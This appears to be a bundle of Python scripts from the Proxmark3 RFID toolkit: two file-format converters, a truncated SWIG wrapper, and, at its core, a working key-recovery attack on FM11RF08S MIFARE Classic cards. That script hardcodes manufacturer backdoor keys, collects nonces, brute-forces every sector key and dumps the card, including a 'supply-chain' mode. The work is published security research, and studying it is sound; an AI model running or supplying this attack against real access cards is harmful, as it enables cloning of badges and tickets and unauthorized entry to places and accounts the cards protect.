# -*- coding: utf-8 -*-

"""
Script to convert amiibo nfc Flipper Zero files to eml files to be used with Proxmark3
Date: 18/05/2023
Script Author: OscarAkaElvis
Tested on: Linux and Windows
OscarAkaElvis - https://twitter.com/OscarAkaElvis
"""

import re
import argparse
import os
from os import path
from sys import argv

# Vars
script_name = path.basename(argv[0])
script_version = "1.0"

# Function to print script's version
def print_version():
    print()
    return 'v{}'.format(script_version)

# Check if the input file is a text file based on its content
def is_text_file(file_path):
    with open(file_path, 'rb') as file:
        try:
            file_content = file.read().decode('utf-8')
            return all(ord(char) < 128 for char in file_content)
        except UnicodeDecodeError:
            return False

# Main script code
def main():
    # Text help data
    description_text = "Script to convert amiibo nfc Flipper Zero files to eml files to be used with Proxmark3."
    epilog_text = 'Example:\n    python3 ' + script_name + ' -i file.nfc -o output.eml'

    # Create an argument parser
    parser = argparse.ArgumentParser(exit_on_error=False, description=description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=epilog_text)
    # Add the input file argument
    parser.add_argument("-i", "--input", required=True, help="Path to the input nfc file.")
    # Add the output file argument
    parser.add_argument("-o", "--output", required=True, help="Name of the output eml file.")
    # Add the version argument
    parser.add_argument('-v', '--version', action='version', version=print_version(), help="Show script's version number and exit")

    # Parse the command-line arguments

    args = parser.parse_args()

    # Extract the file paths from the command-line arguments
    file_path = args.input
    output_file = args.output

    # Check if the target file exists
    if not os.path.isfile(file_path):
        print(f"[!] The input file '{file_path}' does not exist.")
        exit(0)

    # Validation to check if the input file is a text file based on its content
    if not is_text_file(file_path):
        print("[!] The input file does not appear to be a nfc text file.")

    # Check if the input file name has the .nfc extension
    if not file_path.lower().endswith('.nfc'):
        print("[+] Warning. The input file should have the '.nfc' extension.")

    # Get the absolute path of the output file
    output_file_path = os.path.abspath(output_file)

    # Check if the directory of the output file is writable
    output_dir = os.path.dirname(output_file_path)
    if not os.access(output_dir, os.W_OK):
        print(f"[!] The output directory '{output_dir}' is not writable or doesn't exist.")

    # Check if the output file name has the .eml extension
    if not output_file.lower().endswith('.eml'):
        print("[+] Warning. The output file should have the '.eml' extension.")

    # Read the target file
    with open(file_path, 'r') as file:
        file_content = file.read()

    # Extract the data from each "Page X" line
    matches = re.findall(r'Page \d+:(.*?)$', file_content, re.MULTILINE | re.DOTALL)

    if matches:
        # Remove spaces and convert to lowercase for each match
        extracted_data = [re.sub(r'\s', '', match).lower() for match in matches]

        # Join the extracted data with line feeds
        result = '\n'.join(extracted_data)

        # Write the extracted data to the output file
        with open(output_file_path, 'w', newline='\n') as output_file:
            output_file.write(result)
            print(f"[*] File converted successfully. Output eml file written as '{os.path.basename(output_file.name)}'.")
    else:
        # If the needed data is not there
        print("[!] Provided input file seems to not be a valid nfc file to work with.")

# Application entrypoint
if __name__ == '__main__':
    try:
        main()
    except:
        pass




#!/usr/bin/env python3
"""
Combine several attacks to recover all FM11RF08S keys.

Conditions:
* Presence of the backdoor with known key

Duration strongly depends on some key being reused and where.
Examples:
* 32 random keys: ~20 min
* 16 random keys with keyA==keyB in each sector: ~30 min
* 24 random keys, some reused across sectors: <1 min

Doegox, 2024, cf https://eprint.iacr.org/2024/1275 for more info
"""

import os
import sys
import time
import subprocess
import argparse
import json
import re
import pm3
from pm3_resources import find_tool, find_dict

# optional color support
try:
    # pip install ansicolors
    from colors import color
except ModuleNotFoundError:
    def color(s, fg=None):
        """Return the string as such, without color."""
        _ = fg
        return str(s)

required_version = (3, 8)
if sys.version_info < required_version:
    print(f"Python version: {sys.version}")
    print(f"The script needs at least Python v{required_version[0]}.{required_version[1]}. Abort.")
    exit()

# First try FM11RF08S key
# Then FM11RF08 key as some rare *98 cards are using it too
# Then FM11RF32N key, just in case...
BACKDOOR_KEYS = ["A396EFA4E24F", "A31667A8CEC1", "518B3354E760"]

NUM_SECTORS = 16
NUM_EXTRA_SECTORS = 1
DEFAULT_KEYS = set()

staticnested_1nt_path = find_tool("staticnested_1nt")
staticnested_2x1nt_path = find_tool("staticnested_2x1nt_rf08s")
staticnested_2x1nt1key_path = find_tool("staticnested_2x1nt_rf08s_1key")


def match_key(line):
    """
    Extract a 12-character hexadecimal key from a given string.

    Args:
        line (str): The input string to search for the hexadecimal key.

    Returns:
        str or None: The 12-character hexadecimal key in uppercase if found, otherwise None.
    """
    match = re.search(r'([0-9a-fA-F]{12})', line)
    if match:
        return match.group(1).upper()
    else:
        return None


def recovery(init_check=False, final_check=False, keep=False, no_oob=False,
             debug=False, supply_chain=False, quiet=True, keyset=[]):
    """
    Perform recovery operation for FM11RF08S cards.

    Args:
        init_check (bool): If True, check for default keys initially.
        final_check (bool): If True, perform a final check and dump keys.
        keep (bool): If True, keep the generated dictionaries after processing.
        no_oob (bool): If True, do not include out-of-bounds sectors.
        debug (bool): If True, print debug information.
        supply_chain (bool): If True, use supply-chain attack data.
        quiet (bool): If True, suppress output messages.
        keyset (list): A list of key pairs to use for the recovery process.

    Returns:
        dict: A dictionary containing the following keys:
            - 'keyfile': Path to the generated binary key file.
            - 'found_keys': List of found keys for each sector.
            - 'dump_file': Path to the generated dump file.
            - 'data': List of data blocks for each sector.
    """
    def show(s='', prompt="[" + color("=", fg="yellow") + "] ", **kwargs):
        if not quiet:
            s = f"{prompt}" + f"\n{prompt}".join(s.split('\n'))
            print(s, **kwargs)

    start_time = time.time()
    p = pm3.pm3()

    p.console("hf 14a read")
    uid = None

    for line in p.grabbed_output.split('\n'):
        if "UID:" in line:
            uid = int(line[10:].replace(' ', '')[-8:], 16)

    if uid is None:
        show("Card not found")
        return False
    show("UID: " + color(f"{uid:08X}", fg="green"))

    def show_key(sec, key_type, key):
        kt = ['A', 'B'][key_type]
        show(f"Sector {sec:2} key{kt} = " + color(key, fg="green"))

    p.console("prefs show --json")
    prefs = json.loads(p.grabbed_output)
    save_path = prefs['file.default.dumppath'] + os.path.sep

    found_keys = [["", ""] for _ in range(NUM_SECTORS + NUM_EXTRA_SECTORS)]

    if len(keyset) > 0:
        n = min(len(found_keys), len(keyset))
        show(f"{n} Key pairs supplied: ")
        for i in range(n):
            found_keys[i] = keyset[i]
            show(f"  Sector {i:2d} : A = {found_keys[i][0]:12s}   B = {found_keys[i][1]:12s}")

    if init_check:
        show("Checking default keys...")
        p.console("hf mf fchk")
        for line in p.grabbed_output.split('\n'):
            if "[+]  0" in line:
                res = [x.strip() for x in line.split('|')]
                sec = int(res[0][4:])
                if res[3] == '1':
                    found_keys[sec][0] = res[2]
                    show_key(sec, 0, found_keys[sec][0])
                if res[5] == '1':
                    found_keys[sec][1] = res[4]
                    show_key(sec, 1, found_keys[sec][1])

    show("Getting nonces...")
    nonces_with_data = ""
    for key in BACKDOOR_KEYS:
        cmd = f"hf mf isen --collect_fm11rf08s_with_data --key {key}"
        p.console(cmd)
        for line in p.grabbed_output.split('\n'):
            if "Wrong" in line or "error" in line:
                break
            matched = "Saved to json file "
            if matched in line:
                nonces_with_data = line[line.index(matched)+len(matched):]
        if nonces_with_data != "":
            break

    if (nonces_with_data == ""):
        show("Error getting nonces, abort.")
        return False

    try:
        with open(nonces_with_data, 'r') as file:
            # Load and parse the JSON data
            dict_nwd = json.load(file)
    except json.decoder.JSONDecodeError:
        show(f"Error parsing {nonces_with_data}, abort.")
        return False

    nt = [["", ""] for _ in range(NUM_SECTORS + NUM_EXTRA_SECTORS)]
    nt_enc = [["", ""] for _ in range(NUM_SECTORS + NUM_EXTRA_SECTORS)]
    par_err = [["", ""] for _ in range(NUM_SECTORS + NUM_EXTRA_SECTORS)]
    data = ["" for _ in range(NUM_SECTORS * 4)]
    for sec in range(NUM_SECTORS + NUM_EXTRA_SECTORS):
        real_sec = sec
        if sec >= NUM_SECTORS:
            real_sec += 16
        nt[sec][0] = dict_nwd["nt"][f"{real_sec}"]["a"].lower()
        nt[sec][1] = dict_nwd["nt"][f"{real_sec}"]["b"].lower()
        nt_enc[sec][0] = dict_nwd["nt_enc"][f"{real_sec}"]["a"].lower()
        nt_enc[sec][1] = dict_nwd["nt_enc"][f"{real_sec}"]["b"].lower()
        par_err[sec][0] = dict_nwd["par_err"][f"{real_sec}"]["a"]
        par_err[sec][1] = dict_nwd["par_err"][f"{real_sec}"]["b"]
    for blk in range(NUM_SECTORS * 4):
        data[blk] = dict_nwd["blocks"][f"{blk}"]

    show("Generating first dump file")
    dump_file = f"{save_path}hf-mf-{uid:08X}-dump.bin"
    with (open(dump_file, "wb")) as f:
        for sec in range(NUM_SECTORS):
            for b in range(4):
                d = data[(sec * 4) + b]
                if b == 3:
                    ka = found_keys[sec][0]
                    kb = found_keys[sec][1]
                    if ka == "":
                        ka = "FFFFFFFFFFFF"
                    if kb == "":
                        kb = "FFFFFFFFFFFF"
                    d = ka + d[12:20] + kb
                f.write(bytes.fromhex(d))
    show(f"Data has been dumped to `{dump_file}`")

    elapsed_time1 = time.time() - start_time
    minutes = int(elapsed_time1 // 60)
    seconds = int(elapsed_time1 % 60)
    show("----Step 1: " + color(f"{minutes:2}", fg="yellow") + " minutes " +
         color(f"{seconds:2}", fg="yellow") + " seconds -----------")

    dict_def = "mfc_default_keys.dic"
    try:
        dict_path = find_dict(dict_def)
        with open(dict_path, 'r', encoding='utf-8') as file:
            for line in file:
                if line[0] != '#' and len(line) >= 12:
                    DEFAULT_KEYS.add(line[:12])
        show(f"Loaded {dict_def}")
    except FileNotFoundError:
        show(f"Warning, {dict_def} not found.")
    except Exception as e:
        raise Exception(f"Error loading {dict_def}: {e}")

    dict_dnwd = None
    def_nt = ["" for _ in range(NUM_SECTORS)]
    if supply_chain:
        try:
            default_nonces = f'{save_path}hf-mf-{uid:04X}-default_nonces.json'
            with open(default_nonces, 'r') as file:
                # Load and parse the JSON data
                dict_dnwd = json.load(file)
                for sec in range(NUM_SECTORS):
                    def_nt[sec] = dict_dnwd["nt"][f"{sec}"].lower()
                show(f"Loaded default nonces from {default_nonces}.")
        except FileNotFoundError:
            pass
        except json.decoder.JSONDecodeError:
            show(f"Error parsing {default_nonces}, skipping.")

    show("Running staticnested_1nt & 2x1nt when doable...")
    keys = [[set(), set()] for _ in range(NUM_SECTORS + NUM_EXTRA_SECTORS)]
    all_keys = set()
    duplicates = set()
    # Availability of filtered dicts
    filtered_dicts = [[False, False] for _ in range(NUM_SECTORS + NUM_EXTRA_SECTORS)]
    found_default = [[False, False] for _ in range(NUM_SECTORS + NUM_EXTRA_SECTORS)]
    for sec in range(NUM_SECTORS + NUM_EXTRA_SECTORS):
        real_sec = sec
        if sec >= NUM_SECTORS:
            real_sec += 16
        if found_keys[sec][0] != "" and found_keys[sec][1] != "":
            continue
        if found_keys[sec][0] == "" and found_keys[sec][1] == "" and nt[sec][0] != nt[sec][1]:
            for key_type in [0, 1]:
                cmd = [staticnested_1nt_path, f"{uid:08X}", f"{real_sec}",
                       nt[sec][key_type], nt_enc[sec][key_type], par_err[sec][key_type]]
                if debug:
                    print(' '.join(cmd))
                subprocess.run(cmd, capture_output=True)
            cmd = [staticnested_2x1nt_path,
                   f"keys_{uid:08x}_{real_sec:02}_{nt[sec][0]}.dic", f"keys_{uid:08x}_{real_sec:02}_{nt[sec][1]}.dic"]
            if debug:
                print(' '.join(cmd))
            subprocess.run(cmd, capture_output=True)
            filtered_dicts[sec][key_type] = True
            for key_type in [0, 1]:
                keys_set = set()
                with (open(f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}_filtered.dic")) as f:
                    while line := f.readline().rstrip():
                        keys_set.add(line)
                    keys[sec][key_type] = keys_set.copy()
                    duplicates.update(all_keys.intersection(keys_set))
                    all_keys.update(keys_set)
                if dict_dnwd is not None and sec < NUM_SECTORS:
                    # Prioritize keys from supply-chain attack
                    cmd = [staticnested_2x1nt1key_path, def_nt[sec], "FFFFFFFFFFFF",
                           f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}_filtered.dic"]
                    if debug:
                        print(' '.join(cmd))
                    result = subprocess.run(cmd, capture_output=True, text=True).stdout
                    keys_def_set = set()
                    for line in result.split('\n'):
                        matched = match_key(line)
                        if matched is not None:
                            keys_def_set.add(matched)
                    keys_set.difference_update(keys_def_set)
                else:
                    # Prioritize default keys
                    keys_def_set = DEFAULT_KEYS.intersection(keys_set)
                keys_set.difference_update(keys_def_set)
                # Prioritize sector 32 keyB starting with 0000
                if real_sec == 32:
                    keyb32cands = set(x for x in keys_set if x.startswith("0000"))
                    keys_def_set.update(keyb32cands)
                    keys_set.difference_update(keyb32cands)
                if len(keys_def_set) > 0:
                    found_default[sec][key_type] = True
                    with (open(f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}_filtered.dic", "w")) as f:
                        for k in keys_def_set:
                            f.write(f"{k}\n")
                        for k in keys_set:
                            f.write(f"{k}\n")
        else:  # one key not found or both identical
            if found_keys[sec][0] == "":
                key_type = 0
            else:
                key_type = 1
            cmd = [staticnested_1nt_path, f"{uid:08X}", f"{real_sec}",
                   nt[sec][key_type], nt_enc[sec][key_type], par_err[sec][key_type]]
            if debug:
                print(' '.join(cmd))
            subprocess.run(cmd, capture_output=True)
            keys_set = set()
            with (open(f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}.dic")) as f:
                while line := f.readline().rstrip():
                    keys_set.add(line)
                keys[sec][key_type] = keys_set.copy()
                duplicates.update(all_keys.intersection(keys_set))
                all_keys.update(keys_set)
            if dict_dnwd is not None and sec < NUM_SECTORS:
                # Prioritize keys from supply-chain attack
                cmd = [staticnested_2x1nt1key_path, def_nt[sec], "FFFFFFFFFFFF",
                       f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}.dic"]
                if debug:
                    print(' '.join(cmd))
                result = subprocess.run(cmd, capture_output=True, text=True).stdout
                keys_def_set = set()
                for line in result.split('\n'):
                    matched = match_key(line)
                    if matched is not None:
                        keys_def_set.add(matched)
                keys_set.difference_update(keys_def_set)
            else:
                # Prioritize default keys
                keys_def_set = DEFAULT_KEYS.intersection(keys_set)
            keys_set.difference_update(keys_def_set)
            if len(keys_def_set) > 0:
                found_default[sec][key_type] = True
                with (open(f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}.dic", "w")) as f:
                    for k in keys_def_set:
                        f.write(f"{k}\n")
                    for k in keys_set:
                        f.write(f"{k}\n")

    show("Looking for common keys across sectors...")
    keys_filtered = [[set(), set()] for _ in range(NUM_SECTORS + NUM_EXTRA_SECTORS)]
    for dup in duplicates:
        for sec in range(NUM_SECTORS + NUM_EXTRA_SECTORS):
            for key_type in [0, 1]:
                if dup in keys[sec][key_type]:
                    keys_filtered[sec][key_type].add(dup)

    # Availability of duplicates dicts
    duplicates_dicts = [[False, False] for _ in range(NUM_SECTORS + NUM_EXTRA_SECTORS)]
    first = True
    for sec in range(NUM_SECTORS + NUM_EXTRA_SECTORS):
        real_sec = sec
        if sec >= NUM_SECTORS:
            real_sec += 16
        for key_type in [0, 1]:
            if len(keys_filtered[sec][key_type]) > 0:
                if first:
                    show("Saving duplicates dicts...")
                    first = False
                with (open(f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}_duplicates.dic", "w")) as f:
                    keys_set = keys_filtered[sec][key_type].copy()
                    keys_def_set = DEFAULT_KEYS.intersection(keys_set)
                    keys_set.difference_update(DEFAULT_KEYS)
                    for k in keys_def_set:
                        f.write(f"{k}\n")
                    for k in keys_set:
                        f.write(f"{k}\n")
                duplicates_dicts[sec][key_type] = True

    show("Computing needed time for attack...")
    candidates = [[0, 0] for _ in range(NUM_SECTORS + NUM_EXTRA_SECTORS)]
    for sec in range(NUM_SECTORS + NUM_EXTRA_SECTORS):
        real_sec = sec
        if sec >= NUM_SECTORS:
            real_sec += 16
        for key_type in [0, 1]:
            if found_keys[sec][0] == "" and found_keys[sec][1] == "" and duplicates_dicts[sec][key_type]:
                kt = ['a', 'b'][key_type]
                dic = f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}_duplicates.dic"
                with open(dic, 'r') as file:
                    count = sum(1 for _ in file)
    #            print(f"dic {dic} size {count}")
                candidates[sec][key_type] = count
                if nt[sec][0] == nt[sec][1]:
                    candidates[sec][key_type ^ 1] = 1
        for key_type in [0, 1]:
            if ((found_keys[sec][0] == "" and found_keys[sec][1] == "" and
                 filtered_dicts[sec][key_type] and candidates[sec][0] == 0 and
                 candidates[sec][1] == 0)):
                if found_default[sec][key_type]:
                    # We assume the default key is correct
                    candidates[sec][key_type] = 1
                else:
                    kt = ['a', 'b'][key_type]
                    dic = f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}_filtered.dic"
                    with open(dic, 'r') as file:
                        count = sum(1 for _ in file)
    #                print(f"dic {dic} size {count}")
                    candidates[sec][key_type] = count
        if ((found_keys[sec][0] == "" and found_keys[sec][1] == "" and
             nt[sec][0] == nt[sec][1] and candidates[sec][0] == 0 and
             candidates[sec][1] == 0)):
            if found_default[sec][0]:
                # We assume the default key is correct
                candidates[sec][0] = 1
                candidates[sec][1] = 1
            else:
                key_type = 0
                kt = ['a', 'b'][key_type]
                dic = f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}.dic"
                with open(dic, 'r') as file:
                    count = sum(1 for _ in file)
    #            print(f"dic {dic} size {count}")
                candidates[sec][0] = count
                candidates[sec][1] = 1

    if debug:
        for sec in range(NUM_SECTORS + NUM_EXTRA_SECTORS):
            real_sec = sec
            if sec >= NUM_SECTORS:
                real_sec += 16
            show(f" {real_sec:03} | {real_sec*4+3:03} | {candidates[sec][0]:6} | {candidates[sec][1]:6}  ")
    total_candidates = sum(candidates[sec][0] + candidates[sec][1] for sec in range(NUM_SECTORS + NUM_EXTRA_SECTORS))

    elapsed_time2 = time.time() - start_time - elapsed_time1
    minutes = int(elapsed_time2 // 60)
    seconds = int(elapsed_time2 % 60)
    show("----Step 2: " + color(f"{minutes:2}", fg="yellow") + " minutes " +
         color(f"{seconds:2}", fg="yellow") + " seconds -----------")

    # fchk: 147 keys/s. Correct key found after 50% of candidates on average
    FCHK_KEYS_S = 147
    foreseen_time = (total_candidates / 2 / FCHK_KEYS_S) + 5
    minutes = int(foreseen_time // 60)
    seconds = int(foreseen_time % 60)
    show("Still about " + color(f"{minutes:2}", fg="yellow") + " minutes " +
         color(f"{seconds:2}", fg="yellow") + " seconds to run...")

    abort = False
    show("Brute-forcing keys... Press any key to interrupt")
    for sec in range(NUM_SECTORS + NUM_EXTRA_SECTORS):
        real_sec = sec
        if sec >= NUM_SECTORS:
            real_sec += 16
        for key_type in [0, 1]:
            # If we have a duplicates dict
            # note: we skip if we already know one key
            # as using 2x1nt1key later will be faster
            if found_keys[sec][0] == "" and found_keys[sec][1] == "" and duplicates_dicts[sec][key_type]:
                kt = ['a', 'b'][key_type]
                dic = f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}_duplicates.dic"
                cmd = f"hf mf fchk --blk {real_sec * 4} -{kt} -f {dic} --no-default"
                if debug:
                    print(cmd)
                p.console(cmd)
                for line in p.grabbed_output.split('\n'):
                    if "aborted via keyboard" in line:
                        abort = True
                    matched = match_key(line)
                    if matched is not None:
                        found_keys[sec][key_type] = matched
                        show_key(real_sec, key_type, found_keys[sec][key_type])
                        if nt[sec][0] == nt[sec][1] and found_keys[sec][key_type ^ 1] == "":
                            found_keys[sec][key_type ^ 1] = found_keys[sec][key_type]
                            show_key(real_sec, key_type ^ 1, found_keys[sec][key_type ^ 1])
            if abort:
                break
        if abort:
            break

        for key_type in [0, 1]:
            # If we have a filtered dict
            # note: we skip if we already know one key
            # as using 2x1nt1key later will be faster
            if found_keys[sec][0] == "" and found_keys[sec][1] == "" and filtered_dicts[sec][key_type]:
                # Use filtered dict
                kt = ['a', 'b'][key_type]
                dic = f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}_filtered.dic"
                cmd = f"hf mf fchk --blk {real_sec * 4} -{kt} -f {dic} --no-default"
                if debug:
                    print(cmd)
                p.console(cmd)
                for line in p.grabbed_output.split('\n'):
                    if "aborted via keyboard" in line:
                        abort = True
                    matched = match_key(line)
                    if matched is not None:
                        found_keys[sec][key_type] = matched
                        show_key(real_sec, key_type, found_keys[sec][key_type])
            if abort:
                break
        if abort:
            break

        # If one common key for the sector
        if found_keys[sec][0] == "" and found_keys[sec][1] == "" and nt[sec][0] == nt[sec][1]:
            key_type = 0
            # Use regular dict
            kt = ['a', 'b'][key_type]
            dic = f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}.dic"
            cmd = f"hf mf fchk --blk {real_sec * 4} -{kt} -f {dic} --no-default"
            if debug:
                print(cmd)
            p.console(cmd)
            for line in p.grabbed_output.split('\n'):
                if "aborted via keyboard" in line:
                    abort = True
                matched = match_key(line)
                if matched is not None:
                    found_keys[sec][0] = matched
                    found_keys[sec][1] = matched
                    show_key(real_sec, 0, found_keys[sec][0])
                    show_key(real_sec, 1, found_keys[sec][1])
        if abort:
            break

        # If one key is missing, use the other one with 2x1nt1key
        if ((found_keys[sec][0] == "") ^ (found_keys[sec][1] == "")) and nt[sec][0] != nt[sec][1]:
            if (found_keys[sec][0] == ""):
                key_type_source = 1
                key_type_target = 0
            else:
                key_type_source = 0
                key_type_target = 1
            if duplicates_dicts[sec][key_type_target]:
                dic = f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type_target]}_duplicates.dic"
            elif filtered_dicts[sec][key_type_target]:
                dic = f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type_target]}_filtered.dic"
            else:
                dic = f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type_target]}.dic"
            cmd = [staticnested_2x1nt1key_path, nt[sec][key_type_source], found_keys[sec][key_type_source], dic]
            if debug:
                print(' '.join(cmd))
            result = subprocess.run(cmd, capture_output=True, text=True).stdout
            keys = set()
            for line in result.split('\n'):
                matched = match_key(line)
                if matched is not None:
                    keys.add(matched)
            if len(keys) > 1:
                kt = ['a', 'b'][key_type_target]
                cmd = f"hf mf fchk --blk {real_sec * 4} -{kt} --no-default"
                for k in keys:
                    cmd += f" -k {k}"
                if debug:
                    print(cmd)
                p.console(cmd)
                for line in p.grabbed_output.split('\n'):
                    if "aborted via keyboard" in line:
                        abort = True
                    matched = match_key(line)
                    if matched is not None:
                        found_keys[sec][key_type_target] = matched
            elif len(keys) == 1:
                found_keys[sec][key_type_target] = keys.pop()
            if found_keys[sec][key_type_target] != "":
                show_key(real_sec, key_type_target, found_keys[sec][key_type_target])
        if abort:
            break

    if abort:
        show("Brute-forcing phase aborted via keyboard!")
        final_check = False

    plus = "[" + color("+", fg="green") + "] "
    if final_check:
        show("Letting fchk do a final dump, just for confirmation and display...")
        keys_set = set([i for sl in found_keys for i in sl if i != ""])
        with (open(f"keys_{uid:08x}.dic", "w")) as f:
            for k in keys_set:
                f.write(f"{k}\n")
        cmd = f"hf mf fchk -f keys_{uid:08x}.dic --no-default --dump"
        if debug:
            print(cmd)
        p.console(cmd, capture=True, quiet=False)
        for line in p.grabbed_output.split('\n'):
            if "Found keys have been dumped to" in line:
                keyfile = line[line.index("`"):].strip("`")
    else:
        show()
        show(color("found keys:", fg="green"), prompt=plus)
        show(prompt=plus)
        show("-----+-----+--------------+---+--------------+----", prompt=plus)
        show(" Sec | Blk | key A        |res| key B        |res", prompt=plus)
        show("-----+-----+--------------+---+--------------+----", prompt=plus)
        for sec in range(NUM_SECTORS + NUM_EXTRA_SECTORS):
            real_sec = sec
            if sec >= NUM_SECTORS:
                real_sec += 16
            keys = [["", 0], ["", 0]]
            for key_type in [0, 1]:
                if found_keys[sec][key_type] == "":
                    keys[key_type] = [color("------------", fg="red"), color("0", fg="red")]
                else:
                    keys[key_type] = [color(found_keys[sec][key_type], fg="green"), color("1", fg="green")]
            show(f" {real_sec:03} | {real_sec*4+3:03} | " +
                 f"{keys[0][0]} | {keys[0][1]} | {keys[1][0]} | {keys[1][1]} ", prompt=plus)
        show("-----+-----+--------------+---+--------------+----", prompt=plus)
        show("( " + color("0", fg="red") + ":Failed / " +
             color("1", fg="green") + ":Success )", prompt=plus)
        show()
        show("Generating binary key file", prompt=plus)
        keyfile = f"{save_path}hf-mf-{uid:08X}-key.bin"
        unknown = False
        with (open(keyfile, "wb")) as f:
            for key_type in [0, 1]:
                for sec in range(NUM_SECTORS + NUM_EXTRA_SECTORS * (1 - int(no_oob))):
                    k = found_keys[sec][key_type]
                    if k == "":
                        k = "FFFFFFFFFFFF"
                        unknown = True
                    f.write(bytes.fromhex(k))
        show("Found keys have been dumped to `" + color(keyfile, fg="yellow")+"`", prompt=plus)
        if unknown:
            show("  --[ " + color("FFFFFFFFFFFF", fg="yellow") +
                 " ]-- has been inserted for unknown keys", prompt="[" + color("=", fg="yellow") + "]")
    show("Generating final dump file", prompt=plus)
    dump_file = f"{save_path}hf-mf-{uid:08X}-dump.bin"
    with (open(dump_file, "wb")) as f:
        for sec in range(NUM_SECTORS):
            for b in range(4):
                d = data[(sec * 4) + b]
                if b == 3:
                    ka = found_keys[sec][0]
                    kb = found_keys[sec][1]
                    if ka == "":
                        ka = "FFFFFFFFFFFF"
                    if kb == "":
                        kb = "FFFFFFFFFFFF"
                    d = ka + d[12:20] + kb
                f.write(bytes.fromhex(d))
    show("Data has been dumped to `" + color(dump_file, fg="yellow")+"`", prompt=plus)

    # Remove generated dictionaries after processing
    if not keep:
        show("Removing generated dictionaries...", prompt=plus)
        for sec in range(NUM_SECTORS + NUM_EXTRA_SECTORS):
            real_sec = sec
            if sec >= NUM_SECTORS:
                real_sec += 16
            for key_type in [0, 1]:
                for append in ["", "_filtered", "_duplicates"]:
                    file_name = f"keys_{uid:08x}_{real_sec:02}_{nt[sec][key_type]}{append}.dic"
                    if os.path.isfile(file_name):
                        os.remove(file_name)

    elapsed_time3 = time.time() - start_time - elapsed_time1 - elapsed_time2
    minutes = int(elapsed_time3 // 60)
    seconds = int(elapsed_time3 % 60)
    show("----Step 3: " + color(f"{minutes:2}", fg="yellow") + " minutes " +
         color(f"{seconds:2}", fg="yellow") + " seconds -----------")

    elapsed_time = time.time() - start_time
    minutes = int(elapsed_time // 60)
    seconds = int(elapsed_time % 60)
    show("---- TOTAL: " + color(f"{minutes:2}", fg="yellow") + " minutes " +
         color(f"{seconds:2}", fg="yellow") + " seconds -----------")
    return {'keyfile': keyfile, 'found_keys': found_keys, 'dump_file': dump_file, 'data': data}


def main():
    """
    Parse command-line arguments and initiate the recovery process.

    Command-line arguments:
    -x, --init-check: Run an initial fchk for default keys.
    -y, --final-check: Run a final fchk with the found keys.
    -n, --no-oob: Do not save out of bounds keys.
    -k, --keep: Keep generated dictionaries after processing.
    -d, --debug: Enable debug mode.
    -s, --supply-chain: Enable supply-chain mode. Look for hf-mf-XXXXXXXX-default_nonces.json.

    The supply-chain mode json can be produced from the json saved by
    "hf mf isen --collect_fm11rf08s --key A396EFA4E24F" on a wiped card, then processed with
    jq '{Created: .Created, FileType: "fm11rf08s_default_nonces", nt: .nt | del(.["32"]) | map_values(.a)}'.

    This function calls the recovery function with the parsed arguments.
    """
    parser = argparse.ArgumentParser(description='A script combining staticnested* tools '
                                     'to recover all keys from a FM11RF08S card.')
    parser.add_argument('-x', '--init-check', action='store_true', help='Run an initial fchk for default keys')
    parser.add_argument('-y', '--final-check', action='store_true', help='Run a final fchk with the found keys')
    parser.add_argument('-n', '--no-oob', action='store_true', help='Do not save out of bounds keys')
    parser.add_argument('-k', '--keep', action='store_true', help='Keep generated dictionaries after processing')
    parser.add_argument('-d', '--debug', action='store_true', help='Enable debug mode')
    parser.add_argument('-s', '--supply-chain', action='store_true', help='Enable supply-chain mode. '
                        'Look for hf-mf-XXXXXXXX-default_nonces.json')
    # Such json can be produced from the json saved by
    # "hf mf isen --collect_fm11rf08s --key A396EFA4E24F" on a wiped card, then processed with
    # jq '{Created: .Created, FileType: "fm11rf08s_default_nonces", nt: .nt | del(.["32"]) | map_values(.a)}'
    args = parser.parse_args()

    recovery(
        init_check=args.init_check,
        final_check=args.final_check,
        keep=args.keep,
        no_oob=args.no_oob,
        debug=args.debug,
        supply_chain=args.supply_chain,
        quiet=False
    )


if __name__ == '__main__':
    main()



#!/usr/bin/env python3

'''
# Andrei Costin <zveriu@gmail.com>, 2011
# pm3_eml2mfd.py
# Converts PM3 Mifare Classic MFD binary dump file to emulator EML text file
'''


import sys

READ_BLOCKSIZE = 16

def main(argv):
    argc = len(argv)
    if argc < 3:
        print('Usage:', argv[0], 'input.mfd output.eml')
        sys.exit(1)

    with open(argv[1], "rb") as file_inp, open(argv[2], "w") as file_out:
        while True:
            byte_s = file_inp.read(READ_BLOCKSIZE)
            if not byte_s:
                break
            hex_char_repr = byte_s.hex()
            file_out.write(hex_char_repr)
            file_out.write("\n")

if __name__ == '__main__':
    main(sys.argv)



# This file was automatically generated by SWIG (https://www.swig.org).
# Version 4.2.1
#
# Do not make changes to this file unless you know what you are doing - modify
# the SWIG interface file instead.

from sys import version_info as _swig_python_version_info
# Import the low-level C/C++ module
if __package__ or "." in __name__:
    from . import _pm3
else:
    import _pm3

try:
    import builtins as __builtin__
except ImportError:
    import __builtin__

def _swig_repr(self):
    try:
        strthis = "proxy of " + self.this.__repr__()
    except __builtin__.Exception:
        strthis = ""
    return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)


def _swig_setattr_nondynamic_instance_variable(set):
    def set_instance_attr(self, name, value):
        if name == "this":
            set(self, name, value)
        elif name == "thisown":
            self.this.own(value)
        elif hasattr(self, name) and isinstance(getattr(type(self), name), property):
            set(self, name, value)
        else:
            raise AttributeError("You cannot add instance attributes to %s" % self)
    return set_instance_attr


def _swig_setattr_nondynamic_class_variable(set):
    def set_class_attr(cls, name, value):
        if hasattr(cls, name) and not isinstance(getattr(cls, name), property):
            set(cls, name, value)
        else:
